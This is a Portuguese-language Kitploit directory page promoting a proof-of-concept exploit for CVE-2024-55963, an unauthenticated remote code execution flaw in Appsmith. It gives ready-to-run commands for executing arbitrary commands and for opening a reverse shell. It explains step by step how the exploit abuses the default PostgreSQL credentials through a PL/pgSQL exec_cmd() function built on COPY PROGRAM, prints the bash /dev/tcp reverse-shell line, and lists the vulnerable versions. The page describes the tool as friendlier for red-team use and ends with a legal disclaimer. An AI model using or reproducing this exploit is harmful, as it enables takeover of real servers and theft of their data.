Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-55963 — CVE-2024-55963, permite execução remota de código não autenticada na plataforma Appsmith Enterprise devido a um banco de dados PostgreSQL mal configurado incluído por padrão. | Kitploit
Ferramentas/GitHubGitHub/superswan/cve-2024-55963
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoConfiguração IncorretaRed TeamingSegurança de Banco de Dados
GitHubsuperswan/cve-2024-55963

CVE-2024-55963

CVE-2024-55963, permite execução remota de código não autenticada na plataforma Appsmith Enterprise devido a um banco de dados PostgreSQL mal configurado incluído por padrão.

24há 1 anoAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE‑2024‑55963 PoC de RCE no Appsmith

Exploit de PoC para CVE‑2024‑55963 que executa comandos arbitrários ou abre um reverse shell em instâncias vulneráveis do Appsmith.

Ele lida automaticamente tanto com servidores modernos (com o recurso environmentId) quanto com builds muito mais antigas “legacy” que o precedem, então você pode usar um único script para todas as versões, de v1.20 até a última versão vulnerável, a v1.51.


Início rápido

root@kitploit:~
# Executa um comando arbitrário (o padrão é `id`)
python3 appsmith-rce.py https://target.example.com [email protected] password123 "whoami"

# abre um reverse shell
python3 appsmith-rce.py https://target.example.com [email protected] password123 -revshell <ip> <port>

Nota: Qualquer credencial funciona desde que o servidor permita cadastro self‑service. O script tenta fazer login primeiro e, se a conta não existir, recorre ao registro.


Como funciona (visão geral)

  1. Tratamento de CSRF e sessão – obtém o token de vários endpoints possíveis ou do cookie jar e o mantém nas requisições seguintes.
  2. Fluxo de login/cadastro – faz login ou registra um novo usuário com o e‑mail/senha fornecidos.
  • Descoberta de workspace – captura um workspace existente ou aciona o fluxo de onboarding para criar um automaticamente.
  • Detecção de ambiente – consulta /api/v1/environments/workspaces/{id}; se não existir, alterna para o modo legado (environmentId vazio).
  • Configuração de aplicação e página – envia requisição para /api/v1/applications e extrai o pageId.
  • Criação do datasource – cria um datasource PostgreSQL local apontando para localhost:5432 com credenciais postgres/postgres (permitidas pelo pg_hba.conf padrão vulnerável).
  • Objetos SQL – envia uma função auxiliar PL/pgSQL exec_cmd() e uma tabela temporária cmd_output que coleta o STDOUT.
  • Execução de comandos – executa SELECT * FROM exec_cmd('<your cmd>') por meio do endpoint /api/v1/actions/execute
  • Reverse shell (opcional) – executa bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

  • Requisitos

    • Python ≥ 3.8
    • requests

    Versões testadas

    Appsmith versionResult
    1.51✅ RCE
    1.45✅ RCE
    1.30✅ RCE, caminho legado
    1.52+❌ Corrigido – a criação de função falha

    Diferenças em relação ao PoC da Rhino Security Labs

    Este PoC é um aprimoramento do exploit da Rhino Security Labs (não tinha percebido que eles já tinham um PoC público quando estava revisando a pesquisa).

    O PoC da Rhino usa headers, cookies e credenciais estáticos. Ao testar esse exploit, me deparei com problemas quando a conta já existia em versões específicas. Este script permite que o usuário informe qualquer combinação de e‑mail/senha pela linha de comando. Como mencionado, o token CSRF é extraído em vez de depender de valores fixos (hardcoded).

    • Esta versão funciona em servidores mais antigos que não possuem o endpoint Environments API.
    • O caminho de execução é diferente. Esta versão usa COPY PROGRAM dentro do wrapper PL/pgSQL exec_cmd() e a API /actions/execute, mas isso é discutivelmente mais ruidoso. A Rhino depende do endpoint integrado de pré‑visualização de esquema (schema preview) para emitir um comando COPY (SELECT …) ad‑hoc. Esse endpoint trunca o tamanho da saída e adiciona regras extras de citação, o que dificulta a passagem de comandos longos ou payloads encadeados.
    • Flag única de reverse shell (:
    • Randomiza nomes de aplicação/datasource/função
    • Sem dependência de pyfiglet
    • Suporte a servidores mais antigos por meio da detecção automática do header environmentId. O exploit da Rhino presume que ele está sempre presente.

    Juntas, essas escolhas de design tornam o exploit mais curto, mais confiável e mais amigável para uso em red team, ao mesmo tempo que demonstram a mesma vulnerabilidade subjacente.

    Referências

    rhinosecuritylabs.com


    Aviso legal

    Este código é fornecido apenas para fins educacionais e testes autorizados. Executá‑lo contra sistemas que você não possui ou para os quais não tem permissão explícita de teste provavelmente é ilegal. Os autores não aceitam nenhuma responsabilidade pelo uso indevido.

    Baixar ferramenta